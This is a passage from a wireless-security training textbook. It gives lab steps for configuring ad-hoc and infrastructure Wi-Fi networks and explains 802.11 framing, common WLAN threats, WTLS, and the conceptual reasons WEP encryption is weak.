7. Select the Specify Network Settings radio button:
In the IP Address text box, type: 10.0.10.30
In the Subnet Mask text box, type: 255.255.255.0
In the Default Gateway text box, type: 10.0.10.1
8. Leave the DNS text boxes blank, and click Next.
9. Select the Ad-Hoc Mode radio button.
Lesson 9: Securing Wireless Networks 469
10. In the SSID text box, type Ad_Hoc_1 and click Next.
11. In the Channel drop-down list, select Channel 3 and click Next.
12. In the Security drop-down list, select Disabled and click Next. (You will
add security features later in the lesson.)
13. Conrm your settings are correct, and click Save.
470 Tactical Perimeter Defense
14. Verify your IP Address settings via Windows Networking. Note, on some
systems the Linksys conguration tool will not congure the Windows IP
settings. In this case you will be required to manually congure the WNIC.
IP: 10.0.10.30 / 24 DG: 10.0.10.1
15. Leave the screen open, as you will return to it shortly.
Configure the Second WNIC
For the ad-hoc network to function, you need at least two WNICs to communi-
cate with each other. Now that you have installed and congured on single node
in the network, you need to congure a second node. Once both are congured
properly, then the ad-hoc network can begin.
TASK 9B-2
Installing the Netgear WPN511
Setup: This task is performed on the second Windows XP laptop.
1. Log on to Windows XP Professional.
2. Insert the Netgear WPN511 CD-ROM into the CD-ROM drive. If the
setup program does not autorun, navigate to the CD, and double-click the
autorun.exe le.
3. In the Netgear SmartWizard screen, click the Install Software button.
4. In the Welcome screen, click Next.
5. Read the License Agreement, and click Accept.
6. Accept the default Destination Folder, and click Next. The setup les will
now be copied to your computer.
7. Once the software installation is complete, click Next. The setup les will
nish their installation.
8. Insert your Netgear WPN511 card into your computer, and click Next.
9. In the Country drop-down list, select your country, and click Agree.
Lesson 9: Securing Wireless Networks 471
10. Keep the default selection to use the Netgear Smart Wizard for your wireless
connection, and click Next.
11. Select the No, I Want To Congure It Myself radio button, and click
Next.
12. Choose StartAll ProgramsNetgear WPN511 Smart WizardNetgear
Smart Wizard. The tool to congure the Netgear WNIC will open.
13. In the Network Name text box, type Ad_Hoc_1
14. In the Network Type section, select the Computer-to-Computer (Ad Hoc)
radio button.
15. Click the Initiate Ad Hoc button.
472 Tactical Perimeter Defense
16. From the Channel drop-down list, select Channel 3 and click OK.
17. Click the Apply button.
18. Open the Windows Network Connections window, right-click the newly
installed Netgear WNIC, and choose Properties.
19. Select Internet Protocol (TCP/IP), and click Properties.
20. Select the Use The Following IP Address radio button.
21. Enter the following conguration: IP 10.0.10.31, SM 255.255.255.0, DG
10.0.10.1, click OK, click Close, and close the Network Connections
window.
22. In the Netgear WPN511 Smart Wizard window, select the Networks tab.
23. Select the Ad_Hoc_1 network, and click the Connect button. (If no net-
work is listed, click the Find a Network button.)
Lesson 9: Securing Wireless Networks 473
24. Click the Apply button. You will be connected to the Ad_Hoc_1 network
from this computer.
25. Leave the Wireless Network Connection window open for subsequent
tasks.
Enable the Ad-Hoc Network
Now that you have both WNIC installed and the Netgear card is connected to the
Ad-hoc network, you need to simply connect the other side of the network. In
the following task, you will connect the Linksys WNIC, thus enabling the Ad
Hoc network.
TASK 9B-3
Enabling the Ad-Hoc Network
1. Verify that you are at the computer with the Linksys WNIC installed.
2. In the Site Survey screen of the Linksys Network Monitor Tool, click the
Refresh button. You should now see the Ad-Hoc_1 network available.
3. Select the Ad-Hoc_1 network, and click Connect.
474 Tactical Perimeter Defense
4. Once connected, you will see that you have successfully joined the
Ad-Hoc network.
5. Click the More Information button to see the details of this connection.
6. If you wish, open a command prompt and perform a ping test from one
computer to the other to conrm the wireless network is functional.
Lesson 9: Securing Wireless Networks 475
802.11 Framing
Although you will likely never directly work with the design or physical architec-
ture of any wireless network device, you do need a strong understanding of how
the 802.11 network functions in order to implement solid networks. At rst
glance, it seems that the 802.11 network functions in the exact same way as the
Ethernet networks. Upon further investigation you will notice that, although the
appearance is the same, the 802.11 network has very real differences from the
Ethernet network.
The Ethernet network framing is essentially to take the data, add a preamble, add
the required addressing information, such as IP, and add an integrity check (or
Frame Check Sequence) on the end. The wireless network however, must add
more information than that. In the 802.11 network there are multiple frame types.
The three 802.11 frame types are: data frames, control frames, and management
frames.
The data frames are the frames that you will see on the network the most, these
carry the actual data from one node to another. The control frames are for func-
tions like carrier-sensing (like modems) and acknowledgement. The management
frames are what a node uses to join (or associate) and to leave (or disassociate)
an access point.
Frame Format
The rst thing you will notice when looking at the 802.11 frame is that the MAC
uses four address elds. Every 802.11 frame will not use all four elds, and val-
ues that are assigned to the different address elds can actually change based on
the type of MAC frame that is being transmitted.
Figure 9-15: The format of an 802.11 MAC frame.
Frame Details
Every 802.11 frame begins with a two-byte frame control subeld that is divided
into several different subelds. One of the subelds is the protocol version. The
protocol version subeld is a two-bit value, which indicates what version of the
802.11 MAC is found in the frame. Currently, there is only one supported version
of the 802.11 MAC, and that has been given a protocol ID of 0.
An in-depth discussion of
the 802.11 framing format is
beyond the scope of this
course.
476 Tactical Perimeter Defense
Figure 9-16: The frame control of the 802.11 frame, expanded showing its internal
contents.
The second subeld is the type. This indicates the type of subtype to follow. If
this is set to 00, then management frames are to follow. If this is set to 01 then
control frames are to follow, and if this is set to 10, then data frames are to
follow. The third subeld is called the subtype, which is related to the type of
eld just discussed. This subeld is a four-bit value, which indicates the subtype
of the frame. Management subtypes are identied in the following table.
Management Subtype Value Subtype Name
0000 Association request
0001 Association response
0010 Reassociation request
0011 Reassociation response
0100 Probe request
0101 Probe response
1000 Beacon
1001 Announcement trafc indication message
1010 Disassociation
1011 Authentication
1100 Deauthentication
Using the table as reference, you can identify two common subtypes: The asso-
ciation request (0000), and the beacon (1000). Another subeld is the WEP eld.
When this is set to 1, WEP is in use, and when this is set to 0, WEP is not in
use.
The Beacon Subtype Value is
1000.
Lesson 9: Securing Wireless Networks 477
By now you have noticed that there are multiple entries for addresses in the
frame format. The 802.11 frame can use up to four address elds, generally num-
bered one through four. Address eld one is a receiver, address eld two is a
transmitter (or sender), address eld three is ltering, and address eld four is
optional.
The sequence control eld is used for multiple purposes. It uses 4 bits to manage
fragmentation and 12 bits to manage sequence numbers. If a higher-level packet
needs to be fragmented, the sequence number will be constant for all the frag-
ments, but the 4-bit fragment number will increase by 1 for every new fragment.
The data eld is where the upper layer payload goes for transmission. This eld
has a maximum payload value of 2304 bytes of data, and has a maximum size of
2312 bytes. The additional 8 bytes are to allow for the extra information required
of WEP, which must be supported.
Finally, there is a frame check sequence (FCS) eld. This is similar to the FCS in
Ethernet and other networking systems. The FCS allows for an integrity check on
the frame, but there is a difference in the wireless network. The difference in the
802.11 format, is that there is no negative ACK if a frame fails the FCS. Instead
the nodes must wait for an ACK timeout before they retransmit.
802.11 Addressing
As you saw earlier, there are four address elds in the frame, all of which do not
have to be used in each transmission. Before you can make a connection between
an address and an address led, you need to be aware that there are multiple
types of addresses in the 802.11 wireless networks. These addresses can be given
the DA, RA, SA, and TA acronyms. Their denitions are as follows:
Destination Address (DA): This is the MAC address of the node that is to
ultimately process the frame.
Receiving Address (RA): This is the MAC address of the node that will
receive the frame. Note, this does not have to match the DA.
Source Address (SA): This is the MAC address of the node that created the
frame.
Transmitting Address (TA): This is the MAC address of the node that trans-
mitted the frame. Note, this does not have to match the SA.
The address elds will change based on the frame format. For example, the third
eld can hold the SSID address, the DA, or the SA, based on the frame. Where
there is consistency is in the eld that holds the transmitting address, this is
address eld two. Address eld one is designed for the recipient of the frame,
which you must note does not mean the nal destination of the frame, only the
recipient of the current frame.
When the network is in infrastructure mode, the address used is the SSID
address. This is not the same as the SSID that has been manually assigned to the
network, such as the default Linksys. The interface on the physical AP requires a
MAC address, just as any other interface does. In Infrastructure mode, the SSID
address is the MAC address of the AP that is participating in the Infrastructure
network.
The SSID used in MAC
address eld is not the same
as the manually entered
SSID value.
478 Tactical Perimeter Defense
One reason that there are multiple options here for the addressing is that there are
multiple methods for establishing a wireless network. For example, in the most
straightforward network, all the nodes simply talk directly to one another; this is
the ad-hoc network. Another network could be where all the end nodes communi-
cate only with the Access Point. Finally, you could link two (or more) wireless
networks together, with the Access Point of each one functioning as a bridge to
the other network.
Figure 9-17 identies the addresses that would be assigned to each of the four
address elds, and the DS settings, based on the function.
Figure 9-17: The settings of the address elds, based on the frame function.
From this gure, you can identify that the most basic addressing is in ad-hoc
mode, where the frame has a simple DA and SA. This is the closest to the tradi-
tional Ethernet network that most network professionals are familiar with. Of note
in this table are the congurations of the ToDS and FromDS bits. DS is the Dis-
tribution System, for example the Ethernet network that is connected to the wired
side of an AP.
If both the ToDS and FromDS bits are set to 0, then the frame is on an ad-hoc
network. When the ToDS is 1 and the FromDS is 0, this indicates a frame that is
transmitted from a node to an infrastructure network. Conversely, when the ToDS
is 0 and the FromDS is 1, this indicates a frame that is received for a node in an
infrastructure network. Finally, when both the ToDS and FromDS are set to 1,
then the frame is on a wireless bridge, from one wireless network to another.
When the ToDS and FromDS
are both set to zero; the
frames are for a network
running in ad-hoc mode.
Lesson 9: Securing Wireless Networks 479
Figure 9-18: The addressing of two nodes in an ad-hoc network.
When two nodes are communicating in ad-hoc mode, the addressing is clear-cut.
The SSID is identied in the third address eld, and the receiver and transmitter
addresses are entered. This is the most straightforward of all the addressing
options.
Figure 9-19: The addressing of two nodes and one AP in an infrastructure network.
In this second example (an infrastructure network), the addressing becomes more
complex. When the two end nodes initiate their communication, the ToDS bit is
set to 1 and the FromDS bit is set to 0, which indicates a frame sent to an infra-
structure network. The address eld one is the receiving address (RA), which is
the SSID, and address eld two is the source address (SA). In this case the node
480 Tactical Perimeter Defense
that originated the frame is the SA; this is because the frame is sent to the net-
work, not directly to the end node. Notice that address eld three is used; in this
case it holds the destination address of the frame. The destination address is for
the node that is to ultimately process the frame.
As the frames are moved from the AP to the respective end nodes, you can see
that the ToDS bit is now set to 0 and the FromDS bit is now set to 1. This indi-
cates the frame is intended for an end node, coming from the infrastructure
network. Address eld one now contains the address for the actual intended node
that will process the frame. Address eld two contains the SSID, where the frame
was transmitted from, and address eld three contains the source address, where
the frame originated.
Figure 9-20: The addressing of frames in a wireless bridge network.
In the nal addressing example, you have two APs in wireless bridge mode that
are connecting two wireless networks. In this example, you have frames that are
of different functions in the network. The frame that leaves the node that started
the transmission sends a frame that is in infrastructure mode, and is sent to the
AP, with the nal destination address in the third address eld. When the frame
gets to the AP, the network is in bridge mode between the two points, and the
ToDS and FromDS are now both 1s. It is at this time that all the address elds
are used, and it is here that the distinction between transmitting and sending and
receiving and destination addresses are clear.
At the AP, with MACs 2345 and 3456, the frame has a receiving address of
4567, the MAC on the other side of the bridge. The nal destination address is
6789, this is how the addressing makes the difference between a point receiving
the frame, and the end node that is to nally process the frame. Also at the AP,
the frame has a sending address of 1234, as that is where the frame originated,
but the transmitting address is 3456, the AP that is sending the frame to the next
access point.
When the frame is received at the second AP, the frame is then formatted as a
frame in infrastructure mode, with the ToDS set to 0 and the FromDS set to 1.
This frame is then sent to the node that will process the frame, and the series of
frames are complete. In the event that a response to the original sender is
required, the same process will happen, only in reverse.
In infrastructure mode, when
a frame is sent to the AP,
address eld one contains
the SSID address.
In infrastructure mode, when
a frame is sent from the AP,
address eld one contains
the destination address.
Lesson 9: Securing Wireless Networks 481
Access Point Configuration
In order for the network to evolve from an ad-hoc to an infrastructure network,
you need at least one AP. In this section, you will walk through the steps required
to congure an AP with basic settings. At this time, the goal is to create a simple
infrastructure network, running with one single AP, without WEP or any other
advanced conguration.
Most APs will have one of two methods of connecting, and performing the initial
conguration. One of the methods is to connect a USB cable from the AP to a
computer that will run the conguration. A second method is to connect via a
network protocol, with the AP connected using a Cat5 cable versus a USB cable.
This second method, of connecting through the network, generally through a web
browser is becoming very common.
In this task, the steps for installing and conguring the rst AP are shown. This
lesson has two different APs installed, and you will walk through the steps of
installing each AP. The Linksys AP requires a connection through the 192.168.1.0
/ 24 network, so you must congure your computer to this network for the initial
communication.
TASK 9B-4
Installing the Linksys WAP54G Access Point
1. Log on to Windows 2003 Server as Administrator.
2. Open the Properties of your LAN adapter.
3. Select TCP/IP, and click Properties.
4. Enter the following IP Addressing information:
IP Address: 192.168.1.145
Subnet Mask: 255.255.255.0
Default Gateway: This may be left blank
5. Click OK twice, and then click Close.
6. Physically locate the WAP54G access point where you want it in the
room. If possible, this should be a high point in the room, and not near any
source of EMI.
7. Insert the Linksys CD-ROM into the CD-Rom drive. If the setup program
does not autorun, navigate to the CD, and double-click the Setup.exe le.
8. In the Welcome screen, click the Click Here To Start button.
9. Plug in the WAP54G power cord and plug in the supplied network
cable, then click Next.
10. Connect the WAP54G to the network, and click Next.
11. Connect the WAP54G to an outlet, and click Next.
482 Tactical Perimeter Defense
12. Verify all three LEDs are lit on the front panel, and click Next.
13. Note the status of the new AP, including the default IP Address, and click
Yes.
14. Type the default password of admin and click Enter. For ease of running
the course, you will leave the default password in place. In a production
environment, you would use a strong password here.
15. In the IP Address text box, type 10.0.10.1
16. In the Subnet Mask text box, type 255.255.255.0
Lesson 9: Securing Wireless Networks 483
17. Leave the Default Gateway text box empty. Once you have entered this
information, click Next.
18. In the Congure Wireless Settings window, click the Enter Wireless Set-
ting Manually button.
19. In the SSID text box, type SCP_1
20. Leave the Channel drop-down list on Channel 6.
21. In the Network Mode drop-down list, select G-only, then click Next.
484 Tactical Perimeter Defense
22. At this time, you are not conguring Security options, select the Disable
radio button, and click Next.
23. Conrm your settings, and click Yes.
24. Click Exit to close the Access Point conguration tool.
Configure the Infrastructure Clients
Once the AP is congured and running in the network, there needs to be clients
connected to make the Infrastructure network functional. In this section, you will
recongure the client computers to associate with the AP, establishing the infra-
structure network. It is assumed that the initial installation of the clients have
been completed, and in these tasks, you will move directly to the client
conguration.
TASK 9B-5
Configuring the Linksys Client
1. Log on to the computer with the Linksys WPC54G installed.
2. In the Windows system tray, right-click the Linksys WPC54G monitor
icon, and choose Open The Monitor.
Lesson 9: Securing Wireless Networks 485
3. Click the Site Survey tab. You will now see the new AP that has recently
been congured.
4. Click the Proles tab.
5. Click the New option. Type SCP-1 in the text box, and click OK.
6. Select the SCP-1 network, and click Connect.
7. Once you are connected in Infrastructure Mode, click the More Informa-
tion button to see the details of the connection.
486 Tactical Perimeter Defense
Adding Infrastructure Network Clients
To make your network more functional, you will need other clients. You currently
have one AP and one Infrastructure client. In the following task, you will cong-
ure the second wireless networking client.
TASK 9B-6
Configuring the Netgear Client
1. Log on to the computer with the Netgear WPN511 installed.
2. In the Windows system tray, click the Netgear WPN511 Smart Wizard
icon.
3. Click the Networks tab, and highlight the SCP-1 network by clicking on
it.
4. Click the Connect button. The adapter will now connect to the SCP-1
network.
Lesson 9: Securing Wireless Networks 487
5. To make the changes to the adapters conguration, click the Apply button.
You are now connected in Infrastructure mode.
6. If you wish, open a command prompt and perform a ping test from one
computer to the other, and to the access point itself, to conrm the wire-
less network is functional.
WLAN Threats
The threats facing the WLAN are similar to those facing the LAN, with some
variation due to the open medium of the wireless network. The techniques used
to counter the threats will be discussed later in this lesson. You will start with
some of the passive threats.
Eavesdropping and Analysis
One threat that is very prevalent in the WLAN is that of passive eavesdropping
and analysis. Passive eavesdropping is the easiest of all the threats to the WLAN.
A person with a laptop and a wireless network card in promiscuous mode can
simply sit outside of the physical boundary of your network and receive packets.
The attacker does not need to attempt to connect to the network at this time, only
listen.
By receiving packets, a skilled attacker can then analyze the network traffic. This
may lead to the attacker learning protocol information and operating system
information. Attackers can increase the range from which they can receive a sig-
nal by using specialized antennas. These antennas can pull in signals from well
outside the range of the normal WLAN client. Attackers do not need to buy
expensive antennas for this; there are reports of people making successful long-
range antennas out of aluminum cans, washers, and pipes.
488 Tactical Perimeter Defense
War Driving
Something that may not be a specic threat to the WLAN, but in the same cat-
egory is that of war driving. War driving is the practice of building a mobile
wireless machine, with software designed to learn and map wireless networks. In
addition, war drivers may have a powerful external antenna and a Global Posi-
tioning System (GPS) device. Using a GPS, the attacker can record the exact
longitude and latitude of the network that was found while driving.
Along with war driving is a practice called war chalking. War chalking is where a
person who has found a WLAN via war driving marks the location with a
symbol. These symbols represent open networks, closed networks, protected net-
works, and more. The growing list of symbols used to identify networks is
changing frequently.
Figure 9-21: Example of the three main symbols of war chalking.
In the gure, the symbol on the left indicates an open network, where the SSID is
being broadcast by the AP. When chalked, the symbol will include the actual
SSID located and the bandwidth at that point. The middle symbol is a closed net-
work, where the AP is not broadcasting the SSID. This symbol will also list the
SSID, once discovered, and the speed of the connection. The symbol on the right
is one that is protected using the Wired Equivalent Privacy (WEP). WEP will be
discussed in more detail later in this lesson. The WEP symbol, along with the
others, may also contain other information; there is no restriction on what can be
written down. If you come into the office and see a symbol like this near your
network, you should address the security of the network right away.
Gaining Access
An interesting problem that is unique to the WLAN versus the wired network is
that of DHCP. If the WLAN is using DHCP, then any client that turns on in
range and asks for an IP address will be given one. This may include attacker
computers. In some instances, the entire job of the attacker gaining unauthorized
access is to simply nd a WLAN, and there are many tools available to locate
WLANs.
Lesson 9: Securing Wireless Networks 489
Networks that use DHCP must employ another system to defend their wireless
network; otherwise any client may gain access. Even if there were operating sys-
tem level security measures in place to prevent unauthorized users from accessing
a server, they would be in the network. Furthermore, you could have two or more
users accessing the network and communicating with each other, happily using up
your wireless bandwidth.
The man-in-the-middle attack is one that exists on the wired network, and exists
in the wireless world as well. For this to work, the attacker is positioned between
two end points, which is trivial on the wireless network, as being between the
two points does not mean a straight line. The attacker breaks the connection that
is established between the target node and the AP. (The connection can be broken
using an RF Jammer or other form of electrical interference.)
The attacker then congures the attacking machine as the new local AP for the
target, and allows the target to successfully associate with the attacker machine.
The attacker will then route the packets through to the legitimate AP. All packets
can then be stored and analyzed for whatever purpose the attacker has in mind
can be carried out.
Denial of Service
One common threat for all forms of networking is the denial of service. For the
WLAN this can take on new meaning, as there are natural bandwidth restrictions
on the network to begin with. The WLAN has a limited amount of bandwidth to
share among all the WLAN clients. This is due to the physical restriction on the
number of radio waves available to carry data. Unlike the wired network, where
each node to the switch may have dedicated bandwidth, in the WLAN all nodes
share the same 10 MB, and this is amplied when you consider the devices are
half-duplex.
This is a perfect example of why two nodes connecting via DHCP can cause
problems on the network, even if they do not attempt to gain access to servers.
Simply performing large le transfers can tie up the network, or setting up a con-
tinuous ping sequence, or transmitting large malformed packets.
Topic 9C
Wireless Security Solutions
Although there are risks to using wireless networking, there are also solutions to
make the wireless network secure. It can be argued that the wireless network can
never be as secure as the wired network, but there are solutions that you can
implement to provide reasonable levels of security on your wireless networks. In
this topic you will examine and implement several of these solutions.
490 Tactical Perimeter Defense
Wireless Transport Layer Security (WTLS)
As the WLAN grows and becomes more a part of our everyday life, and as
remote devices use WAP more, security of these networks is of obvious
importance. One tool available to the security professional is Wireless Transport
Layer Security (WTLS). WTLS has basic goals: to provide data integrity, privacy
for the two end points, and authentication between the two end points. The
WTLS stack is designed specically for the low bandwidth and high latency net-
works that are used for wireless communication.
WTLS Origins
WTLS is considered a security protocol for wireless networking, most specically
applying to WAP, and is sponsored by the WAPforum. WTLS is designed to pro-
vide for the assurance that messages sent to and from end points in the wireless
network have not been modied. WTLS is based on TLS, which is based upon
SSL.
WTLS Authentication
When moving towards the security of a trusted network, authentication is a
requirement. WTLS is no different. The method of authentication used in WTLS
is certicates. It is possible to implement WTLS to not require certicates, but in
order to increase the security, certicates are recommended. Various formats of
certicates are allowed in WTLS, including the X.509v3 format.
WTLS Components
WTLS is split into multiple components. The lower layer is called the Record
Protocol (RP). The RP takes the raw data from the higher layers, performs com-
pression, encryption, and transmits the data. Likewise, upon receipt the RP takes
the data, performs decompression, decryption, and moves the data up to the
higher layers. The RP also performs message checking to verify the message has
not been altered. Once the RP has done its job, it will deliver the data to the four
higher-level clients of WTLS.
Figure 9-22: The components of WTLS.
There are four higher-level clients in the design of WTLS: handshake protocol,
alert protocol, application protocol, and change cipher specic protocol. Although
the extensive details of each of these are beyond the scope of this book, you
should be familiar with the function of each client.
WTLS Handshake Protocol
The WTLS handshake protocol client allows the two end points in the communi-
cation to agree upon the security parameters of the communication. This includes
issues such as the protocol version used, cryptographic algorithms used, and the
handshake procedure.
Lesson 9: Securing Wireless Networks 491
Figure 9-23: The WTLS handshake process.
There are several steps to the handshake of WTLS. The rst step is done from
the client, just as in SSL, the client initiates the communication by sending a
hello message, called ClientHello, to the server. The server responds with a
ServerHello message. Between these two hello messages, the client and server are
agreeing upon the session conguration. When the client sends the initial hello
message, the client will indicate the cryptographic algorithms that the client sup-
ports, and the server hello message will include the algorithm chosen in the
response.
After the initial hello phase the server will send its certicate, called
ServerCerticate, and will request the clients certicate. At this time, the server
will also send the ServerKeyExchange, which is used to give the client the public
key, which will be used to exchange the pre-master secret value. The master
secret value will be the nal piece used in the session. The server will then send
a ServerHelloDone message, indicating to the client to move on to the next step
in the handshake.
Upon receipt of the ServerHelloDone message, the client proceeds to send the
requested certicate and a ClientKeyExchange. The ClientKeyExchange contains
either the pre-master secret value (encrypted with the servers public key) or
other information to use in completing the key exchange. The client then sends
an optional ChangeCipherSpec message. Finally, the client will send a Finished
message to the server. The Finished message contains a verication of the agreed
upon information for the session.
The server will respond with a Finished message as well, verifying the security
and session parameters. The server will also send a ChangeCipherSpec message,
and the session will be established.
492 Tactical Perimeter Defense
In the event that the session gets disrupted during communication, there is a
means to re-establish the session without a complete new handshake. During a
session, there is a SessionID assigned to the communication between the two end
points. If communication is cut, the client will send a ClientHello message, only
this time it will include the previous SessionID. The server responds with a
ServerHello, also with the SessionID. Upon matching the session, a
ChangeCipherSpec message will be sent, and then the session can be resumed
without the complete handshake.
WTLS Change Cipher Specific Protocol
The ChangeCipherSpec Protocol message can be sent by either the client or the
server. This message indicates a change in the cipher used for the communication.
The changing of the cipher can happen upon the re-establishment of a session,
but is most often part of the original handshake process.
WTLS Alert Protocol
The WTLS Alert Protocol is what manages error handling in the session. There
are three states of alert messages: warning, critical, and fatal. These messages are
sent in whatever the current state the session is in, encrypted, non-encrypted, and
so on. The warning message is a standard message warning of an existing
condition.
If a critical alert message is sent, then both ends ensure the secure communica-
tion is terminated. However, other connections are allowed to continue using the
secure session, and the existing SessionID may be used to establish a new secure
connection.
If a fatal alert message is sent, then both ends ensure the secure connection is
terminated. Other connections between the two ends using the same secure ses-
sion may continue, but the SessionID associated with the fatal alert is invalidated,
meaning the terminated connection cannot be used for new secure connections.
WTLS Application Protocol
In WTLS, the Application Protocol is simply a means for interfacing with the
upper layers. In the context of this course there are no security ramications or
technical issues that network administrators and professionals will have to
congure.
Fundamental Access Point Security
On most modern access points there are a few things, outside of cryptography,
that you can do to increase the security of your wireless network. One is to dis-
able the SSID broadcast, removing the constant announcement that you have a
wireless network available. Another is to enable MAC address ltering, which
allows you to list the allowed and/or disallowed MAC addresses for your
network.
By disabling the SSID broadcast you are taking a simple step by removing the
AP that constantly sends out frames to the world that your wireless network is
here, this is the SSID, and to please try to associate. It is better to keep that quiet.
Allow the end node to send a frame to the AP, and let the AP respond. An
attacker that is listening to the radio waves around your network will still likely
get this SSID information, but at least your APs are not specically trying to con-
tact the attacker.
Lesson 9: Securing Wireless Networks 493
The MAC address ltering is a bit more tedious, but provides a bit more control
and security over the network. The process of ltering is very direct, you create a
list of addresses, then dene that as allowed or disallowed. The common imple-
mentation of the MAC address lter is to build the list of allowed addresses and
mark them as allowed. Your lter then denes all other addresses as disallowed.
This is not a solution to rely on as your main system since MAC addresses can
be spoofed.
Neither SSID broadcast disabling nor MAC address ltering are enough protec-
tion for you to consider your wireless network secure, but they are reasonable
layers you can add to your defense. The key to protecting your enterprise is to
create layer upon layer that work together to protect your resources, and these are
two small options that add layers.
Wired Equivalent Privacy (WEP)
When the 802.11 standard was created, those involved in the project were very
aware of the problems of wireless communications in regards to security. In the
wireless network, the word broadcast takes on a whole new meaning. WEP was
designed to provide levels of condence in the security of the radio signals, as
they would be encrypted.
The initial response to WEP was positive, that WEP would ensure the security of
the wireless transmissions, and nearly all equipment vendors support WEP. How-
ever, the one thing that is true regarding cryptography is that there is no perfect
system. Eventually aws and modern technology will force the move to new
forms of cryptography. This usually takes some time, but for WEP the time went
by very quickly.
The general points regarding the implementation of WEP shows some weakness
in the overall design. For example, WEP is not a security system that is turned on
by default. It is up to administrators and/or users to enable WEP, and then up to
those same people to properly congure it. Also, WEP utilizes a pre-shared key,
where both the AP and WNIC must be made aware of the key, or series of avail-
able keys.
Cryptography and WEP
WEP uses a symmetric key system, where the secret key is shared between the
two end points, the AP and the WNIC. There is no standard system for exchang-
ing the secret key data, so the most common method is to simply manually
congure the two nodes with the correct key(s). To provide the encryption in
WEP, the RC4 cipher is used. This particular cipher is a symmetric stream cipher,
and follows all the standard uses of symmetric key cryptography.
RC4 is a well-known cipher, used in many secure systems such as SSL. The
problem in WEP is not the RC4 cipher, rather the implementation of the cipher.
Implementation is generally where the problems with encryption come into play,
and WEP is the prime example of this situation. Before moving into further detail
on WEP, you must examine stream ciphers.
The stream ciphers, as the name implies, stream the bits through the cryptosystem
one at a time. The raw data is then combined with the Key stream in an exclu-
sive OR (XOR) operation to produce the Cipher stream. The Cipher stream is
then transmitted to the receiving node, where the process is repeated in reverse to
produce the raw data.
494 Tactical Perimeter Defense
Figure 9-24: The standard operation of a stream cipher.
The stream cipher takes the short secret key and extends that into a larger value,
the same length as the message, just like a one-time pad. This extension is cre-
ated using a pseudorandom number generator (PRNG). To summarize, the sender
XORs the plaintext with the key stream to produce the cipher text, and the
receiver uses the identical key stream in reverse to produce the original plaintext.
Since the stream cipher works by reversing the equation on the receiving end, the
key is the critical component. The receiver will use the same key stream as the
sender, and simply XORs the ciphertext to arrive at the plaintext message. Since
the XORs cancel each other, if the plaintext=P, the ciphertext=C, and the key
stream=K, then assume the following equation:
P = C XOR K = P XOR K XOR K = P
Take the key stream, K, and two encrypted messages, P
1
and P
2
, which go
through the process to become C
1
and C
2
. If this is the case, C
1
= P
1
XOR K,
and C
2
= P
2
XOR K. Since the K is the same, and the XOR process is well
known, you can assume then that the following equation is true:
C
1
XOR C
2
= P
1
XOR K XOR P
2
XOR K = P
1
XOR P
2
This means the attacker has now learned the XOR of two plaintext messages,
without any difficulty. This example highlights why a stream cipher such as this
should never encrypt two messages with the same K.
WEP and Key Lengths
The standard implementations of WEP utilize 64-bit shared RC4 keys. Many
people consider a 64-bit key to be weak, and those people have serious issues
with how WEP implements those 64-bits, and for good reason! Of the 64 avail-
able bits, 40 are assigned to the shared secret key value. This is where the term
Lesson 9: Securing Wireless Networks 495
40-bit WEP comes from. In order to extend the life of WEP, several vendors
moved to offer 128-bit WEP, of which only 104 bits were used for the shared
secret key. If you are wondering where the extra bits that are not used for the
keys are going, they are going to what is called the Initialization Vector (IV).
In order to protect network transmissions from pure brute-force decryption
attacks, WEP is designed with the option of using a set of keys. Four keys can be
generated, and WEP can cycle through those four keys.
The WEP Process
As the RC4 cipher has been shown over time to be a solid cipher, the WEP prob-
lem is found in the process, in the way that WEP attempts to protect data.
Understanding the process is critical in order to follow the steps of cracking
WEP, and making the realization that WEP provides little security.
For WEP to function, the two ends of the communication will have established
their secret key already. This is done by manually entering the single key that is
used, or by having a sequence of predened keys to use. Many networks that
implement WEP use the single secret key option. Administrators of these net-
works take some time to create a long and complex key, using the full
alphanumeric options.
Using the single key, and a strong one at that, is nice. However, as you will see,
there is actually not much added security by using such a strong single key. The
other option of having a series of keys to use provides for a slightly higher level
of security, as the single key is not reused for every single wireless transmission.
Here again however, you will see that the implementation of WEP is such that
the rolling key option does not provide much more security.
496 Tactical Perimeter Defense
Figure 9-25: The WEP encryption process.
The process begins when the sender initiates the system for transmitting a
message. At this time, the plaintext is run through an integrity check algorithm to
create the Integrity Check Value (ICV). The 802.11 specications dene the use
of CRC-32 for this function. The ICV is then appended to the end of the original
plaintext message.
A 24-bit random (more on this in a moment) Initialization Vector (IV) number is
generated and added to the front of the secret key. (In this example the standard
40-bit secret key value is used.) The IV and secret key combo are input into the
Key Scheduling Algorithm (KSA).
The KSA is used to generate a seed value that will be used by the PRNG. The
following key sequence uses the value generated by the PRNG to create the key
stream that will match the length of the plaintext.
Once the key stream has been generated, it is XORed with the plaintext/ICV to
produce the encrypted portion of the message. The same IV that was input to the
KSA is prepended to the front of the encrypted message, a standard header and
FCS are added to the message, and it is transmitted.
Lesson 9: Securing Wireless Networks 497
Figure 9-26: The WEP decryption process.
Upon receipt of the message at the destination, the process is essentially done in
reverse. In order for the destination node to generate the symmetric key stream,
the variable IV must be used. This is the reason that the IV must be sent in
unencrypted form; the destination needs this value.
Using the shared secret key, the destination takes the IV and runs it through the
same KSA, PRNG, and key sequencing to get the key stream. The key stream
and the ciphertext are then XORed, and the resulting Plaintext and ICV are
calculated. Finally, the destination node computes a new ICV, and checks to see
if this new value matches the sent ICV. If there is a match, then the receiving
node will accept and process the message.
WEP Weakness
So, throughout this discussion, you may be wondering where the weakness is
found. Actually, there is more than one weakness, but the problems really start to
show when looking at the implementation of the IV.
498 Tactical Perimeter Defense
The IV is a 24-bit eld, regardless of the number of bits allocated to the secret
key. Therefore, when you implement 64-bit WEP, only 40-bits are for the key,
and 24-bits are for the IV. When you implement 128-bit WEP, only 104-bits are
for the key, and 24-bits are for the IV.
A 24-bit eld does not yield very many possibilities, only 16,777,216 possible
combinations. This means that every 16.7 million times the IV is used it will
have no choice but to repeat itself. Busy networks will transmit that many pack-
ets in a matter of hours at the most, and due to randomness it is likely that values
will be reused long before the 16 million mark.
But, in most networks the attacker will not have to wait for nearly 17 million
transmissions to nd a duplicate IV. This is because many WNICs reset the IV to
0 when the card is reinitialized. As WNICs are reinitialized frequently in busy
networks, nding a repeating pattern may take a very short time.
If an attacker has any idea of the contents of the plaintext message, then the job
of breaking WEP is that much easier. This can be accomplished by the attacker
being the one to generate the plaintext message such as send an email or ping
into the WEP-protected network, and sniffing the result. Knowing the formatting
of messages sent and received will also increase the attackers success rate. Given
that message formatting is known, such as the rst byte of plaintext data being
the SNAP header, this is not a difficult assumption. Once the attacker has built up
